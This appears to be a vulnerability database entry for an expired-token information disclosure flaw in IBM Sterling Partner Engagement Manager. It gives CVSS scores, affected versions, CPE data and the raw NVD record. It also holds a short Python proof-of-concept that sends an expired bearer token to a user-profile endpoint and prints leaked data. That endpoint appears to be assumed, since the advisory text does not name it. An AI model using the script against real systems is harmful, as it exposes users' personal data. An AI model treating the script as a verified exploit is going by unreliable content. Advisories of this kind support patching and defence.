Security Vulnerability Report
CVE-2025-13723 CVSS 5.3 MEDIUM

CVE-2025-13723

Published: 2026-03-13 19:53:49
Last Modified: 2026-03-18 19:18:28

Description

IBM Sterling Partner Engagement Manager 6.2.3.0 through 6.2.3.5 and 6.2.4.0 through 6.2.4.2 could allow an attacker to obtain sensitive user information using an expired access token.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Primary metric in the raw record below: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (confidentiality impact rated HIGH rather than LOW)
Weakness: CWE-324 (Use of a Key Past its Expiration Date)

Configurations (Affected Products)

cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:* (6.2.3 up to, excluding, 6.2.3.6) - VULNERABLE
cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:* (6.2.3 up to, excluding, 6.2.3.6) - VULNERABLE
cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:* (6.2.4 up to, excluding, 6.2.4.3) - VULNERABLE
cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:* (6.2.4 up to, excluding, 6.2.4.3) - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE (platform qualifier, combined with the product entries above by AND)
IBM Sterling Partner Engagement Manager 6.2.3.0 - 6.2.3.5
IBM Sterling Partner Engagement Manager 6.2.4.0 - 6.2.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13723 PoC - Expired Token Information Disclosure
# Target: IBM Sterling Partner Engagement Manager
# Affected Versions: 6.2.3.0-6.2.3.5, 6.2.4.0-6.2.4.2
import json

import requests

TARGET_URL = "https://target-server.example.com"
VULN_ENDPOINT = "/api/v1/user/profile"


def exploit_expired_token():
    """
    Simulate obtaining and using an expired access token.
    In a real scenario, the token would be captured from a legitimate user session.
    """
    headers = {
        "Authorization": "Bearer <expired_access_token>",
        "Content-Type": "application/json",
    }

    # Attempt to access the protected endpoint with the expired token
    response = requests.get(
        f"{TARGET_URL}{VULN_ENDPOINT}",
        headers=headers,
        verify=False,
        timeout=30,
    )

    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")

    # If the token is still accepted (vulnerability present), sensitive data is leaked
    if response.status_code == 200:
        data = response.json()
        print("[!] VULNERABLE: Expired token was accepted!")
        print(f"[!] Leaked user data: {json.dumps(data, indent=2)}")
        return True

    print("[*] NOT VULNERABLE: Token properly rejected")
    return False


if __name__ == "__main__":
    print("CVE-2025-13723 PoC")
    print("=" * 50)
    exploit_expired_token()

References

https://www.ibm.com/support/pages/node/7263391 (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13723", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:48.673", "lastModified": "2026-03-18T19:18:28.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Sterling Partner Engagement Manager 6.2.3.0 through 6.2.3.5 and 6.2.4.0 through 6.2.4.2 could allow an attacker to obtain sensitive user information using an expired access token"}, {"lang": "es", "value": "IBM Sterling Partner Engagement Manager 6.2.3.0 a 6.2.3.5 y 6.2.4.0 a 6.2.4.2 podría permitir a un atacante obtener información sensible del usuario utilizando un token de acceso caducado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-324"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:*", "versionStartIncluding": "6.2.3", "versionEndExcluding": "6.2.3.6", 
"matchCriteriaId": "687DC91A-7A4C-4FF2-8E23-65C8CDC5F52D"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:*", "versionStartIncluding": "6.2.3", "versionEndExcluding": "6.2.3.6", "matchCriteriaId": "7D427503-5EF4-485A-8073-C6C0B5723C2A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:essentials:*:*:*", "versionStartIncluding": "6.2.4", "versionEndExcluding": "6.2.4.3", "matchCriteriaId": "AB87CB0E-55B9-4C72-A592-C7E162A10C63"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:sterling_partner_engagement_manager:*:*:*:*:standard:*:*:*", "versionStartIncluding": "6.2.4", "versionEndExcluding": "6.2.4.3", "matchCriteriaId": "C07A609D-EF2B-423D-8006-B75E33C858D8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7263391", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}